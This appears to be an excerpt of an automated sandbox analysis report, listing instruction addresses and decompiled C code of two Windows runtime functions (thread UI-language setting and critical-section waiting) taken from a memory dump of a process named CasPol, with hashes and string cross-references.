0x016025b2
0x016025b5
0x016025b8
0x016025bb
0x016025bc
0x016025bf
0x016025c2
0x016025c5
0x016025c6
0x016025cb
0x016025ce
0x016025d8
0x016025dd
0x016025de
0x016025e1
0x016025e3
0x016025e9
0x016026da
0x016026da
0x016026dd
0x016026e2
0x01645b56
0x00000000
0x016026e8
0x016026f9
0x016026fb
0x016026fe
0x01602700
0x01645b60
0x00000000
0x01602706
0x01602706
0x0160270a
0x0160270a
0x0160270d
0x01602713
0x01602716
0x01602718
0x0160271c
0x0160271e
0x01645b6c
0x01645b6f
0x01645b7f
0x01645b89
0x01645b8e
0x01645b93
0x01645b96
0x01645b9c
0x01645ba0
0x01645ba3
0x01645bab
0x01645bb0
0x01645bb3
0x01645bb3
0x01645ba3
0x01602724
0x01602726
0x01602729
0x0160272c
0x0160279d
0x0160279d
0x016027a0
0x016027a2
0x00000000
0x0160272e
0x0160272e
0x01602731
0x01602734
0x01602734
0x01602736
0x01645bc1
0x01645bc1
0x01645bc4
0x00000000
0x01645bca
0x01645bca
0x01645bcd
0x00000000
0x01645bd3
0x00000000
0x01645bd3
0x01645bcd
0x0160273c
0x0160273c
0x01602742
0x01602747
0x0160274a
0x0160274d
0x01602750
0x00000000
0x01602756
0x01602756
0x00000000
0x01602902
0x01602908
0x0160290b
0x00000000
0x01602911
0x0160291c
0x01602921
0x00000000
0x01602921
0x00000000
0x00000000
0x01602880
0x01602887
0x0160288c
0x00000000
0x00000000
0x01602805
0x0160280a
0x01602814
0x01602816
0x00000000
0x00000000
0x0160281e
0x01602821
0x01602823
0x00000000
0x01602829
0x01602829
0x01602831
0x0160283c
0x0160283e
0x00000000
0x0160283e
0x00000000
0x00000000
0x0160284e
0x01602850
0x01602851
0x01602854
0x01602857
0x0160285a
0x0160285c
0x0160285d
0x00000000
0x00000000
0x0160275d
0x01602761
0x00000000
0x01602767
0x0160276e
0x01602773
0x01602773
0x01602776
0x01602778
0x0160277e
0x0160277e
0x01602781
0x01602781
0x01602783
0x01602784
0x00000000
0x00000000
0x01645bd8
0x01645bde
0x01645be4
0x01645be6
0x01645be8
0x01645be9
0x01645bee
0x01645bf8
0x01645bff
0x01645c01
0x01645c04
0x01645c07
0x01645c0b
0x01645c0d
0x01645c0d
0x01645c15
0x01645c18
0x01645c1b
0x01645c1b
0x01645c1e
0x00000000
0x00000000
0x016028c3
0x016028c8
0x016028d2
0x016028d4
0x016028d8
0x016028db
0x01645c26
0x01645c28
0x01645c2d
0x01645c2d
0x00000000
0x00000000
0x01645c34
0x01645c36
0x01645c49
0x01645c4e
0x01645c54
0x01645c5b
0x01645c5d
0x01645c60
0x01602788
0x01602788
0x0160278b
0x0160278e
0x0160278e
0x0160278e
0x01602791
0x00000000
0x00000000
0x01602756
0x01602750
0x00000000
0x01602794
0x01602794
0x01602795
0x01602798
0x01602798
0x00000000
0x01602734
0x0160272c
0x01602700
0x016025ef
0x016025ef
0x016025ef
0x016025f2
0x016025f8
0x00000000
0x00000000
0x016025fe
0x00000000
0x016028e6
0x016028ec
0x016028ef
0x016028f5
0x016028f8
0x016028f8
0x00000000
0x016028f8
0x00000000
0x00000000
0x01602866
0x01602866
0x01602876
0x01602879
0x00000000
0x00000000
0x016027e0
0x016027e7
0x016027e9
0x016027eb
0x01645afd
0x00000000
0x01645afd
0x00000000
0x00000000
0x01602633
0x01602638
0x0160263b
0x0160263c
0x0160263e
0x01602640
0x01602642
0x01602647
0x01602649
0x0160264e
0x01602650
0x01602653
0x01602659
0x016026a2
0x016026a7
0x016026ac
0x016026b2
0x01645b11
0x01645b15
0x01645b17
0x00000000
0x016026b8
0x016026b8
0x016026ba
0x016027a6
0x016027a6
0x016027a9
0x016027ab
0x016027b9
0x016027b9
0x016027be
0x016027c1
0x016027c3
0x016027c5
0x016027c7
0x01645c74
0x01645c79
0x01645c79
0x016027c7
0x00000000
0x016026c0
0x016026c0
0x016026c3
0x016026c6
0x016026c6
0x016026c9
0x016026c9
0x00000000
0x016026c9
0x016026ba
0x0160265b
0x0160265b
0x0160265e
0x01602667
0x0160266d
0x01602677
0x0160267c
0x0160267f
0x01602681
0x01645b49
0x01645b4e
0x016027cd
0x016027d0
0x016027d1
0x016027d2
0x016027d4
0x016027dd
0x01602687
0x01602687
0x0160268a
0x0160268b
0x0160268e
0x0160268f
0x01602691
0x01602696
0x01602698
0x0160269d
0x0160269f
0x00000000
0x0160269f
0x01602681
0x00000000
0x00000000
0x01602846
0x00000000
0x00000000
0x01602605
0x0160260a
0x0160260c
0x01602611
0x01602616
0x01602619
0x01602619
0x0160261e
0x00000000
0x01602624
0x01602627
0x01602627
0x00000000
0x00000000
0x01645b1f
0x00000000
0x00000000
0x01602894
0x0160289b
0x0160289d
0x016028a1
0x01645b2b
0x01645b2e
0x01645b2e
0x016028a7
0x016028a9
0x01645b04
0x01645b09
0x01645b09
0x01645b09
0x00000000
0x00000000
0x01645b35
0x01645b3c
0x016028fb
0x016028fb
0x016026cc
0x016026cc
0x016026d0
0x00000000
0x016026d2
0x016026d2
0x00000000
0x016026d2
0x00000000
0x00000000
0x016025fe
0x0160292d
0x0160292f
0x01602930
0x01602935
0x01602937
0x01602938
0x0160293b
0x0160293c
0x0160293e
0x0160293f
0x01602940
0x01602942
0x01602944
0x01602947
0x01602948
0x0160294e
0x0160294f
0x01602957
0x0160295a
0x0160295d
0x01602960
0x01602962
0x01602963
0x01602964
0x01602966
0x01602969
0x0160296a
0x0160296e
0x0160296f
0x01602972
0x01602973
0x0160297b
0x0160297e
0x0160297f
0x01602980
0x01602981
0x01602982
0x01602983
0x01602984
0x01602985
0x01602986
0x01602987
0x01602988
0x01602989
0x0160298a
0x0160298b
0x0160298c
0x0160298d
0x0160298e
0x0160298f
0x01602990
0x01602992
0x01602997
0x016029a3
0x016029a6
0x016029ab
0x016029ad
0x016029b0
0x016029b2
0x01645c80
0x016029b8
0x016029b8
0x016029bb
0x016029c0
0x016029c5
0x016029c6
0x016029c6
0x016029c9
0x016029cb
0x00000000
0x00000000
0x016029cd
0x016029d0
0x016029d9
0x016029db
0x016029dd
0x01602a7f
0x01602a84
0x01602a87
0x01602a89
0x01645ca1
0x01645ca3
0x00000000
0x01602a8f
0x01602a8f
0x00000000
0x01602a8f
0x00000000
0x016029e3
0x016029e3
0x016029e3
0x00000000
0x016029e3
0x016029dd
0x00000000
0x016029db
0x016029e6
0x016029e9
0x016029eb
0x016029ed
0x016029f3
0x016029f5
0x016029f8
0x016029fa
0x01602a97
0x01602a9a
0x01602a9d
0x01602add
0x00000000
0x01602a9f
0x01602aa2
0x01602aa5
0x01602aa8
0x01602aab
0x01645cab
0x01645caf
0x01645cc5
0x01645cda
0x01645cdc
0x01645cdf
0x01645ce5
0x00000000
0x01645ceb
0x01645ced
0x01645cee
0x00000000
0x01645cee
0x01645cb1
0x01645cb4
0x01645cb9
0x01645cbb
0x00000000
0x01645cbd
0x01645cbd
0x00000000
0x01645cbd
0x01645cbb
0x01602ab1
0x01602ab1
0x01602ac4
0x01602ac6
0x01602ac6
0x00000000
0x01602ac6
0x01602aab
0x00000000
0x01602a00
0x01602a09
0x01602a0e
0x01602a21
0x01602a24
0x01602a35
0x01602a3a
0x01602a3d
0x01602a42
0x01602a59
0x01602a59
0x01602a5c
0x01602a5f
0x01602a5f
0x016029fa
0x016029f3
0x01602a64
0x01602a64
0x01602a6b
0x01602a6b
0x01602a6d
0x01602a72
0x01602a72
0x00000000

Strings

PATH, xrefs: 01602642, 01602691

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 19e47abaa6154cbd833c9d16849f1c702a5bebce4809a1e567e119b817750fee
Instruction ID: 74383dd8d79b076e4d657f0884c99c54605627fae5659d3e41de8eedc94410b7
Opcode Fuzzy Hash: 19e47abaa6154cbd833c9d16849f1c702a5bebce4809a1e567e119b817750fee
Instruction Fuzzy Hash: C5C19F71D102199FDB2ADF99DC94ABEBBB5FF48700F18402DE505AB390D734A942CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0160FAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0160FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E015EEEF0(0x16c7b60);
					_t134 =  *0x16c7b84; // 0x77997b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x16c7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x16c7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E015E6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E015E76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01678938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E015DB150();
													}
													_t116 = E01676D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E015E75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x16c8638; // 0x0
																	_t122 = L015E38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E015E76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E015E76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0160FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L015E70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0160FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0160FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0160FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0160FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0160FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x16c7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x16c7b84 = _t75;
						_t73 = E015EEB70(_t134, 0x16c7b60);
						if( *0x16c7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E015EFF60( *0x16c7b20);
							}
						}
						goto L5;
					}
				}
			}

0x0160fab0
0x0160fab2
0x0160fab3
0x0160fab4
0x0160fabc
0x0160fac0
0x0160fb14
0x0160fb17
0x0160fac2
0x0160fac8
0x0160facd
0x0160fad3
0x0160fad3
0x0160fadd
0x0160fb18
0x0160fb1b
0x0160fb1d
0x0160fb1e
0x0160fb1f
0x0160fb20
0x0160fb21
0x0160fb22
0x0160fb23
0x0160fb24
0x0160fb25
0x0160fb26
0x0160fb27
0x0160fb28
0x0160fb29
0x0160fb2a
0x0160fb2b
0x0160fb2c
0x0160fb2d
0x0160fb2e
0x0160fb2f
0x0160fb3a
0x0160fb3b
0x0160fb3e
0x0160fb41
0x0160fb44
0x0160fb47
0x0160fb4a
0x0160fb4d
0x0160fb53
0x0164bdcb
0x0164bdcb
0x0160fb59
0x0160fb5b
0x0160fb5b
0x0160fb5e
0x0164bdd5
0x0164bdd8
0x00000000
0x0164bdda
0x00000000
0x0164bdda
0x0160fb64
0x0160fb64
0x0160fb64
0x0160fb67
0x0160fb6e
0x0160fb70
0x0160fb72
0x00000000
0x0160fb78
0x0160fb7a
0x0160fb7a
0x0160fb7d
0x0160fb80
0x0164bddf
0x0164bde1
0x00000000
0x0164bde3
0x00000000
0x0164bde3
0x0160fb86
0x0160fb86
0x0160fb86
0x0160fb8b
0x0160fb90
0x0160fb92
0x0160fb94
0x0160fb9a
0x0160fb9b
0x0160fba1
0x0164bde8
0x0164bdeb
0x0164bded
0x0164beb5
0x0164beb5
0x0164bebb
0x0164bebd
0x0164bec3
0x0164bed2
0x0164bedd
0x0164bedd
0x0164beed
0x00000000
0x0164bdf3
0x0164bdfe
0x0164be06
0x0164be0b
0x0164be0d
0x0164be0f
0x0164be14
0x0164be19
0x0164be20
0x0164be25
0x0164be27
0x0164be35
0x0164be39
0x0164be46
0x0164be4f
0x0164be54
0x0164be56
0x0164bef8
0x0164bef8
0x00000000
0x0164be5c
0x0164be5c
0x0164be60
0x00000000
0x0164be66
0x0164be66
0x0164be7f
0x0164be84
0x0164be87
0x0164be89
0x0164be8b
0x0164be99
0x0164be9d
0x0164bea0
0x0164beac
0x0164beaf
0x0164beb1
0x0164beb3
0x0164beb3
0x00000000
0x0164bea2
0x0164bea2
0x00000000
0x0164bea2
0x0164be8d
0x0164be8d
0x0164be92
0x00000000
0x0164be92
0x0164be8b
0x0164be60
0x0164be3b
0x0164be3b
0x0164be3e
0x00000000
0x0164be40
0x0164be40
0x0164be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0164be44
0x0164be3e
0x0164be29
0x0164be29
0x00000000
0x0164be29
0x0164be27
0x00000000
0x0160fba7
0x0160fba7
0x0160fbab
0x0164bf02
0x0160fbb1
0x0160fbb1
0x0160fbb8
0x0160fbbd
0x0160fbbd
0x0160fbbf
0x0160fbbf
0x0160fbc5
0x0160fbcb
0x0160fbf8
0x0160fbf8
0x0160fbfa
0x00000000
0x0160fc00
0x0160fc00
0x0160fc03
0x00000000
0x0160fc09
0x0160fc09
0x0160fc0f
0x0160fc15
0x0160fc23
0x0160fc23
0x0160fc25
0x0160fc27
0x0160fc75
0x0160fc7c
0x0160fc84
0x00000000
0x0160fc29
0x0160fc29
0x0160fc2d
0x0160fc30
0x0164bf0f
0x00000000
0x0160fc36
0x0160fc38
0x0160fc3b
0x0160fc41
0x0164bf17
0x0164bf19
0x0164bf48
0x0164bf4b
0x00000000
0x0164bf1b
0x0164bf22
0x0164bf24
0x0164bf26
0x00000000
0x0164bf2c
0x0164bf37
0x0164bf39
0x0164bf3b
0x00000000
0x0164bf41
0x0164bf41
0x0164bf41
0x0164bf41
0x0164bf45
0x00000000
0x0164bf45
0x0164bf3b
0x0164bf26
0x00000000
0x0160fc47
0x0160fc47
0x0160fc49
0x0160fcb2
0x0160fcb4
0x0160fcb6
0x0160fcdc
0x0160fcdc
0x00000000
0x0160fcb8
0x0160fcc3
0x0160fcc5
0x0160fcc7
0x00000000
0x0160fcc9
0x0160fcc9
0x0160fccd
0x00000000
0x0160fccd
0x0160fcc7
0x00000000
0x0160fc4b
0x0160fc4b
0x0160fc4e
0x0160fc4e
0x0160fc51
0x0160fc51
0x0160fc54
0x0160fc5a
0x0160fc5c
0x0160fc5f
0x0160fc61
0x0160fc63
0x0160fc65
0x0160fc67
0x0160fc6e
0x0160fc72
0x0160fc72
0x0160fc72
0x0160fc72
0x0160fc67
0x0160fc61
0x00000000
0x0160fc5a
0x0160fc49
0x0160fc41
0x0160fc30
0x0160fc27
0x0160fc03
0x0160fbcd
0x0160fbd3
0x0160fbd9
0x0160fbdc
0x0160fbde
0x0160fc99
0x0160fc9b
0x0160fc9d
0x0160fcd5
0x0160fcd5
0x0160fc89
0x0160fc89
0x00000000
0x0160fc9f
0x0160fc9f
0x0160fca3
0x00000000
0x0160fca3
0x00000000
0x0160fbe4
0x0160fbe4
0x0160fbe4
0x0160fbe4
0x0160fbe9
0x0160fbf2
0x00000000
0x0160fbf2
0x0160fbde
0x0160fbcb
0x0160fbab
0x0160fc8b
0x0160fc8b
0x0160fc8c
0x0160fb80
0x0160fb72
0x0160fb5e
0x0160fc8d
0x0160fc91
0x0160fadf
0x0160fadf
0x0160fae1
0x0160fae4
0x0160fae7
0x0160faec
0x0160faf8
0x0160fb00
0x0160fb07
0x0160fb0f
0x0160fb0f
0x0160fb07
0x00000000
0x0160faf8
0x0160fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0164BE0F

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: b4d062c79c06cf1b7a22815dd4f76495d1cecd571d87ce332345590de93a5e82
Instruction ID: b446f4467f78642aba6fddbbceb040b01f3c9227a9a6a2ff861532282bf3461d
Opcode Fuzzy Hash: b4d062c79c06cf1b7a22815dd4f76495d1cecd571d87ce332345590de93a5e82
Instruction Fuzzy Hash: D1A1C271A006068BEB3ADF68CC5577BB7A5BF88710F0445A9D9469B7C1DB30D9428B90

Uniqueness

Uniqueness Score: -1.00%

Function 015D2D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E015D2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x16c5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x16c7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E016197C0();
				}
				if( *0x16c79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x16c79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01601624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E015F7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0166FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01619520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0160E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0162DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x16c6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x16c6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01619980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E016195D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E015F7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E015F7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01657016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0166FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x16c5350;
							if(_t109 != 0x16c5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0166FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01665720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x015d2d8a
0x015d2d8a
0x015d2d92
0x015d2d96
0x015d2d9e
0x015d2da0
0x015d2da3
0x015d2da5
0x015d2da8
0x015d2dab
0x015d2db2
0x0162f9aa
0x0162f9ab
0x0162f9ae
0x0162f9ae
0x015d2db8
0x015d2dc2
0x0162f9b9
0x0162f9be
0x0162f9bf
0x0162f9bf
0x015d2dcf
0x0162f9c9
0x015d2dd5
0x015d2dd5
